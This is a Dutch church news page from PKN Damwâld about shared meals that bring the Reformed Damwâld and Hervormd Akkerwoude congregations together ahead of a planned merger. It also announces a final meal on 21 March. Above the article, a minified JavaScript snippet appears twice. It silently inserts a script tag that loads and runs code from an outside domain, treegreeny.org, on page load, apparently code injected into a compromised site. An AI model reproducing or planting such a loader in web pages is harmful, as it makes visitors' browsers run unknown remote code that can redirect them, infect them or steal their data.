;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); De liefde gaat door de maag … tafel van verbinding zeer geslaagd ! - PKN Damwâld

De liefde gaat door de maag … tafel van verbinding zeer geslaagd !

Gepubliceerd op: dinsdag 14 maart 2023

Als het spreekwoord ‘liefde gaat door de maag’ de opmaat is voor een gelukkig huwelijk tussen Gereformeerd Damwâld en Hervormd Akkerwoude, dan waren de ‘verbindingsmaaltijden’ van 8 maart en 13 maart daar een perfecte verbeelding van. Ja, samen eten verbindt! Aan tafel ontmoeten mensen elkaar. Het past bij een open en gastvrije gemeente, die uitstraalt ‘samen bij God te gast!’

Een stukje historie: In Damwâld hebben Hervormden en Gereformeerden tot op heden gewacht om helemaal samen te gaan. Op allerlei gebied, maar eigenlijk vooral op bestuurlijk niveau is er al jaren een prettige en broodnodige samenwerking, maar de ‘gewone’ kerkganger merkte daar niet veel van. De jaren tot 1960/1970 waren de jaren van de vaste zuilen. Ieder ging naar of bouwde zijn of haar eigen kerk, was lid van eigen zangkoor, sportvereniging enzovoorts. In de loop van de jaren veranderde dat. Clubs en verenigingen fuseerden en zelfs kerkenraden gingen nadenken of het zo allemaal verder kon. Je leeft met elkaar in het dorp, je trouwt als Hervormde met een Gereformeerde (of andersom), je bent kind van ouders die, zoals dat vroeger heette, ‘gemengd’ gehuwd zijn. Een ‘huwelijk’ (uiterlijk) per 1 januari 2025 tussen Gereformeerd Damwâld en Hervormd Akkerwoude ligt dan ook geheel voor de hand.

Geloven is iets dat je samendoet, het delen van geloof en kennis, het elkaar inspireren en bemoedigen. Als Hervormden en Gereformeerden kennen we inmiddels al jaren de mooie samenwerking in bijvoorbeeld vorming- en toerusting, diaconaat, evangelisatie, de snuffelkring, de Bijbelkring, de gespreksgroep ‘geloven boven de dertig’, de catechese ‘geloven met een beperking’ en de Alpha- en Emmaüscursus, erediensten en vieringen, de (pastorale-) predikantsvervanging bij vakanties, het Bijbeluurtje in Nij Tjaerda, een gezamenlijke website en de Paadwizer, om alle kruisbestuivingen in het jeugdwerk hier maar niet te benoemen. Tussen alle maaltijden door zijn velen actief in het kerkenwerk, in de wijk of de colleges of de jeugdraad; veel staat er op het menu. De coronatijd noopte beide gemeentes om zelfs de reguliere kerkdiensten samen te voegen. Het verliep in een reuzenvaart en zonder gedoe. Sterker nog: het lijkt erop dat er al één Protestantse Gemeente Damwâld is ontstaan, zonder dat we al officieel voor de kerk getrouwd zijn!

Wat zou het geheim van een gelukkig huwelijk tussen de Damwoudster Hervormden en de Gereformeerden kunnen zijn? Het is een ontdekkingstocht om elkaar te vinden, om te zien wat het moment van ons vraagt. Wat meewerkt is dat er geen heel grote inhoudelijk verschillen zijn tussen beide gemeentes. Inmiddels is onze fusiecommissie al druk bezig om onze relatie vast te leggen. Verkering, verloven … de perfecte tijd om elkaar goed te leren kennen, om plannen te maken voor een gezamenlijke toekomst.

Elkaar goed leren kennen … hoe doe je dat? Onze verbindingscommissie opperde: ‘Misschien moeten we eens samen gaan eten, een maaltijd in de kerk. Het idee sloeg meteen aan. Samen eten! Samen eten is passie, gezelligheid, vriendschap. Het is delen, genieten en het verbindt. Samen eten is tijd met elkaar doorbrengen en de manier hoe je elkaar beter leert kennen als gereformeerden en hervormden gemeenteleden. Niet voor niets bleek de ‘tafelvraag’: ‘Vraag eens aan je tafelgenoten wat je voor hen betekent. Verrast het antwoord je?’ daarvoor een probaat middel!

Dinsdag 21 maart in de Ontmoeting is de laatste verbindingsmaaltijd. De inloop is vanaf 17.30 uur en het heerlijke buffet begint om 18.00 uur. Alle gemeenteleden kunnen zich nog aanmelden voor die maaltijd! (zie bijlage!)

We hebben elkaar hard nodig hebben om een gezin te zijn in het huis van God. Dan gaan we elkaar vragen stellen, steken we elkaar de helpende hand toe en maken we gebruik van de gave van de ander. We voeden elkaar op en zien naar elkaar om – bezield door de Geest, gevoed door het Woord.

Voor ieder van ons een plaats aan de tafel …